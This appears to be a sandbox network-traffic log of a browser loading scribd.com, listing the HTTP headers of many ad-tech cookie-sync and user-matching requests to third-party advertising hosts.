Source: global trafficHTTP traffic detected: GET /c/?adExInit=rise&gdpr=%5BGDPR%5D&gdpr_consent=%5BUSER_CONSENT%5D&redir=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11574%26id%3D%24UID HTTP/1.1Host: s.ad.smaato.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /sync?redirect=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11595%26id%3D%7BID5UID%7D&gdpr_consent=&gdpr=0&us_privacy=&gdpr_pd=&source=5&google_push=&retry=true HTTP/1.1Host: sync.inmobi.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /usersync2/rmpssp?sub=zeta&zcc=1&redir=https%3A%2F%2Fssp.disqus.com%2Fmatch%3Fbidder%3D37%26buyeruid%3D%5BRX_UUID%5D%26r%3DCid1YS1hNDc3YzRhYi01MjNlLTM3MDQtODA5My04YzVjYTM0ZjY3OGIqYmh0dHBzOi8vY3Mtc2VydmVyLXMycy55ZWxsb3dibHVlLmlvL2NzP2Z3cmQ9MSZhaWQ9MTE2MTImaWQ9dWEtYTQ3N2M0YWItNTIzZS0zNzA0LTgwOTMtOGM1Y2EzNGY2NzhiMgIlGzgB&cb=1739863028401 HTTP/1.1Host: sync.1rx.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: geo.privacymanager.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /g/v2/212.json HTTP/1.1Host: id5-sync.comConnection: keep-aliveContent-Length: 801sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cksync.php?cs=25&gdpr=%5BGDPR%5D&gdpr_consent=%5BUSER_CONSENT%5D&ovsid=%7B%7BAPID%7D%7D&redirect=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11585%26id%3D%3Cvsid%3E&type=ris HTTP/1.1Host: contextual.media.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /AdServer/ImgSync?gdpr=0&gdpr=0&gdpr_consent=&gdpr_consent=&p=160295&pu=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11576%26id%3D%23PMUID HTTP/1.1Host: image8.pubmatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cs?fwrd=1&aid=11584&uid=x_7JdzzTT9zdixp6qPn6&gdpr=0&gdpr_consent=&us_privacy= HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /cs?aid=11599&id=OPTOUT HTTP/1.1Host: cs.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /api/sync?callerId=77&gdpr=0&gdpr_consent= HTTP/1.1Host: ssbsync.smartadserver.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /webfonts43j533.js HTTP/1.1Host: cdn.btmessage.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /getuid?https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D98%26uid%3D$UID&gdpr=0&gdpr_consent= HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: XANDR_PANID=yoDWIi40QA0l92CMfnRGTVK6j8ph7xMEE2hovwWpxM3jlu8-JszEEuNouxtI9R3D-QUOCwsGww6GCGm89qzRlyyUz_8TuJUoh7BvVk-kenM.; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /px.gif?ch=2 HTTP/1.1Host: ad-delivery.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8If-None-Match: "ad4b0f606e0f8465bc4c4c170b37e1a3"If-Modified-Since: Wed, 05 May 2021 19:25:32 GMT
Source: global trafficHTTP traffic detected: GET /AdServer/ImgSync?p=159706&gdpr=0&gdpr_consent=&us_privacy=&pu=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D114%26gdpr%3D${GDPR}%26gdpr_consent%3D${GDPR_STRING}%26uid%3D%23PMUID HTTP/1.1Host: image8.pubmatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /user-matching?id=3679&gdpr=0&gdpr_consent= HTTP/1.1Host: ads.stickyadstv.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=onetag_eb&gdpr=0&gdpr_consent=&google_cm HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /c/882/0/8/1.gif?gdpr=0&gdpr_consent=&us_privacy= HTTP/1.1Host: id5-sync.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /sync?ssp=onetag&ssp_user_id=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4&gdpr=0&gdpr_consent= HTTP/1.1Host: rtb.mfadsrvr.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /usermatch?d=https%3A%2F%2Fwww.scribd.com%2F&s=184674&cb=https%3A%2F%2Fcdn.indexww.com%2Fht%2Fhtw-pixel.gif%3F HTTP/1.1Host: ssum-sec.casalemedia.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://js-sec.indexww.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /api/sync?callerId=5&gdpr=0&gdpr_consent=&us_privacy=&redirectUri=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D107%26uid%3D[ssb_sync_pid] HTTP/1.1Host: ssbsync-global.smartadserver.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /usync.js HTTP/1.1Host: eus.rubiconproject.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://eus.rubiconproject.com/usync.html?endpoint=us-east&p=rise_engageAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: khaos_p=M7A5IT3R-G-GNOQ; audit_p=1|p3NZOIPdcs7g2WF2nGvUU+SRTrMPTneuTTZKI3TR72YkDyl9IZRjbpAY6ebCcuOOT6F3oGgylxdCbuL7wqM7W24/AOYgyMTzmjbisE4m2Mfme0rGRDIQp2HZvLHXgE7qKreeM+I17A+st7tELqFbcc9dWb1LRf1hfY0V14FIbwNNc4QTpadywtzpQ7vzkXQ/; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /73c1e1bfc3bde354d60b80e601ae3914.gif?puid=[UID]&redir=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D164%26gdpr%3D0%26gdpr_consent%3D%26uid%3D%5BUID%5D&gdpr=${GDPR}&gdpr_consent=${GDPR_STRING}&ccpa=&coppa= HTTP/1.1Host: cs.admanmedia.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /tap.php?v=223352&nid=4584&put=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4 HTTP/1.1Host: pixel.rubiconproject.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: khaos_p=M7A5IT3R-G-GNOQ; audit_p=1|p3NZOIPdcs7g2WF2nGvUU+SRTrMPTneuTTZKI3TR72YkDyl9IZRjbpAY6ebCcuOOT6F3oGgylxdCbuL7wqM7W24/AOYgyMTzmjbisE4m2Mfme0rGRDIQp2HZvLHXgE7qKreeM+I17A+st7tELqFbcc9dWb1LRf1hfY0V14FIbwNNc4QTpadywtzpQ7vzkXQ/; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /exchange/sync.php?p=onetag&gdpr=0&gdpr_consent= HTTP/1.1Host: pixel-eu.rubiconproject.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: khaos_p=M7A5IT3R-G-GNOQ; audit_p=1|p3NZOIPdcs7g2WF2nGvUU+SRTrMPTneuTTZKI3TR72YkDyl9IZRjbpAY6ebCcuOOT6F3oGgylxdCbuL7wqM7W24/AOYgyMTzmjbisE4m2Mfme0rGRDIQp2HZvLHXgE7qKreeM+I17A+st7tELqFbcc9dWb1LRf1hfY0V14FIbwNNc4QTpadywtzpQ7vzkXQ/; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /match/?int_id=113&gdpr=0&gdpr_consent=&callback=https%3A%2F%2Fs.amazon-adsystem.com%2Fecm3%3Fex%3Donetag.com%26id%3D%24%7BUSER_TOKEN%7D&ot_initiated=1 HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/usync/?gdpr=0&gdpr_consent=&pubId=69f48c2160c8113Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: OTP=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4
Source: global trafficHTTP traffic detected: GET /cs?fwrd=1&aid=11596&gdpr=[GDPR]&gdpr_consent=[USER_CONSENT]&id=8561637051911725247 HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /match/?int_id=106&redir=1&ot_initiated=1&gdpr=0&gdpr_consent= HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/usync/?gdpr=0&gdpr_consent=&pubId=69f48c2160c8113Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: OTP=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4
Source: global trafficHTTP traffic detected: GET /match?bidder=37&buyeruid=OPTOUT&r=Cid1YS1hNDc3YzRhYi01MjNlLTM3MDQtODA5My04YzVjYTM0ZjY3OGIqYmh0dHBzOi8vY3Mtc2VydmVyLXMycy55ZWxsb3dibHVlLmlvL2NzP2Z3cmQ9MSZhaWQ9MTE2MTImaWQ9dWEtYTQ3N2M0YWItNTIzZS0zNzA0LTgwOTMtOGM1Y2EzNGY2NzhiMgIlGzgB HTTP/1.1Host: ssp.disqus.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: zeta-ssp-user-id=ua-a477c4ab-523e-3704-8093-8c5ca34f678b
Source: global trafficHTTP traffic detected: GET /cs?aid=11601&id=67214f0eef092fecdc1ae63b60e4b2&gdpr_consent=&gdpr=0 HTTP/1.1Host: cs.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /pub/sync?pubid=pub10101531197440&gdpr=0&gdpr_consent= HTTP/1.1Host: t.adx.opera.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
